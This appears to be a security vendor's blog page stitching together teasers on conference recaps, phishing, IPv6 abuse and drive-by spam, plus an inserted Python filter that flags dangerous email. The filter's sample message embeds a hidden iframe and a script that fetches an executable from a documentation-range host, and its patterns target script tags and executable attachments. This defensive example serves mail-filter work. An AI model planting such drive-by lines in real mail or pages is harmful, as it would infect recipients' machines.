This is the second and final recap of the ROOTCON 2012 annual hacker conference and information security gathering, which zveloLABS had the opportunity of attending. Following are additional highlights that deserve to be shared instead of being tucked away in my personal notebook.
The threat landscape continues to evolve. Individual and state-backed hackers and agencies are increasingly emboldened to compromise websites and servers, steal CPU cycles for cryptocurrency mining, use social engineering to find backdoors, and sway public opinion through fake news and other measures. zvelo provides the most advanced URL/IP categorization database for web filtering, whitelists and blacklists, and residential and business protections against bad actors and malicious online behavior. Explore zvelo’s cybersecurity and threat intelligence data feeds for industry-leading malicious and phishing exploit detection and the most advanced cyber threat intelligence available to OEMs and device manufacturers.
zveloLABS® recently had the opportunity to attend ROOTCON 2012, an annual hacker conference and information security gathering held in Cebu City, Philippines. The organizer line-up was interesting and quite varied, and attendees came from the government, private and academic sectors. Following is part one of two recaps about this insightful event.
Malware authors are quick to exploit weaknesses in IPv6 as more and more websites support the new communications protocol. Some IPv6 tools can be turned to malicious use even though they were built to bridge IPv6 and IPv4: transition and tunneling mechanisms, for instance, can carry traffic past controls that only inspect IPv4.
zveloLABS detected a suspicious-looking email purporting to come from the Electronic Federal Tax Payment System (EFTPS) of the U.S. Treasury Department. This email is fraudulent and claims that “Your Federal Tax Payment ID has been rejected.” The payment rejection is falsely attributed to the use of an invalid identification number. Here is an example of the actual phishing email (see image 01), followed by some observations that should raise red flags about its validity.
At DEF CON 2012 in Las Vegas I sat through a presentation titled “Owning One to Rule them All,” given by penetration testers Dave Kennedy and Dave DeSimone. They discussed a recent penetration test that used Microsoft System Center Configuration Manager (MSCCM) to gain access to essentially an entire network of computers. MSCCM is intended to streamline the management of many devices (desktops, laptops, smartphones and tablets) within an IT infrastructure. While a tool like MSCCM is convenient, handing it over-broad administrative rights means that whoever compromises it inherits those rights over every managed machine, which can lead to serious network security headaches, including breaches.
Imagine for a second you were presented with a superhuman baby having the ability to learn and retain vast amounts of information. We’ll make it a girl super baby as a tribute to fem-heroes of comic book past. Now, what if on your shoulders lays the opportunity to raise her up and teach her the sum of all human knowledge that ever existed? Like every good mentor, you watch her closely making sure her misunderstandings and confusions are always kept checked, corrected, and resolved. You take pride in how accurate she becomes and are quick to reply “Bring it!” to anyone who wants to test her knowledge. Here at zvelo this what-if situation is a reality and I’d like to share with you the experience of training and working with an intelligent being day after day.
The recent crackdown on well-known Torrent services, aided by Internet Service Providers, has led to the increasing use of anonymizers. As the name implies, anonymizers allow for anonymous web browsing and are used by end users to bypass restrictions or blocks on web content. Anonymizers are proxy services, or “proxies,” that receive and execute web requests on behalf of the user, so that the activity is seen by the destination as coming from the proxy and is difficult to trace back to the user. It is this hard-to-trace aspect of anonymizers that has caught the attention of the underground community.
“Drive-by” spam attacks are a growing business network security risk. A user opens an email containing a malicious script, the script downloads malware to the user’s PC, and from there the infection spreads to the company’s network. These emails don’t always include an attachment: some HTML-based varieties are reported to be triggered by merely opening the email and nothing more.
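The following is an added example, not code from the original post or from zvelo, showing the kind of check a mail filter can run against a message of this type: it walks the MIME parts of an email and flags HTML bodies that carry active content (script, iframe, object/embed, javascript: URIs, inline event handlers, meta refresh) as well as attachments that are executables by extension or by their leading “MZ” bytes. The sample message is constructed for the example; the host 203.0.113.5 is a documentation address, not a real one.

```python
"""Flag e-mail messages whose HTML body carries active content or whose
attachments are executables.  Added example; not zvelo's own filter code."""
import email
import re
from email import policy
from email.message import EmailMessage

# Constructed sample message for the example (not a real captured spam):
# an HTML body with an embedded <script> and a hidden iframe, plus a base64
# attachment whose first bytes are the DOS "MZ" executable header.
SAMPLE_EML = """\
From: billing@example.net
To: victim@example.com
Subject: Invoice overdue
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your invoice is overdue.</p>
<iframe src="http://203.0.113.5/loader.php" width="0" height="0"></iframe>
<script>document.location='http://203.0.113.5/dl.exe';</script>
</body></html>
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAA
--b1--
"""

# Heuristic markers of active content in an HTML body (case-insensitive).
ACTIVE_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "iframe_tag": re.compile(r"<\s*iframe\b", re.I),
    "object_or_embed": re.compile(r"<\s*(object|embed)\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "inline_event_handler": re.compile(r"\son\w+\s*=", re.I),
    "meta_refresh": re.compile(r'<\s*meta[^>]+http-equiv\s*=\s*["\']?refresh', re.I),
}

# Attachment extensions Windows will execute directly (hypothetical policy list).
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd",
                   ".js", ".vbs", ".jar", ".hta")


def scan_message(raw: str) -> dict:
    """Return findings for one RFC 822 message given as a string."""
    msg: EmailMessage = email.message_from_string(raw, policy=policy.default)
    findings = {"html_active_content": [], "executable_attachments": [],
                "mz_attachments": []}
    for part in msg.walk():
        if part.is_multipart():
            continue                      # containers carry no payload of their own
        ctype = part.get_content_type()
        filename = part.get_filename()
        if ctype == "text/html":
            body = part.get_content()     # decoded text of the HTML part
            for name, pattern in ACTIVE_PATTERNS.items():
                if pattern.search(body):
                    findings["html_active_content"].append(name)
        elif filename:
            if filename.lower().endswith(EXEC_EXTENSIONS):
                findings["executable_attachments"].append(filename)
            payload = part.get_payload(decode=True) or b""
            if payload[:2] == b"MZ":      # PE/DOS executable regardless of name
                findings["mz_attachments"].append(filename)
    flagged = any(findings[k] for k in ("html_active_content",
                                        "executable_attachments",
                                        "mz_attachments"))
    findings["verdict"] = "suspicious" if flagged else "clean"
    return findings


if __name__ == "__main__":
    print(scan_message(SAMPLE_EML))
```

The regexes are deliberately loose (they fire on a tag anywhere in the text, including inside comments), because for mail filtering a false positive on an HTML-with-script message costs far less than a miss; a production filter would additionally hand the rendered HTML and any attachment to a sandbox rather than trust pattern matching alone.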
zveloLABS™ reported live from the 2011 Hack in the Box Security Conference (HITBSecConf) in Malaysia. Following are additional reflections about the conference and other highlights worth mentioning.
In mid-September 2011, I had the privilege of attending a Sophos seminar titled “Anatomy of an Attack – How Hackers Threaten your Security,” hosted by Chester Wisniewski, a highly regarded Senior Security Advisor and frequent contributor to the award-winning Naked Security blog.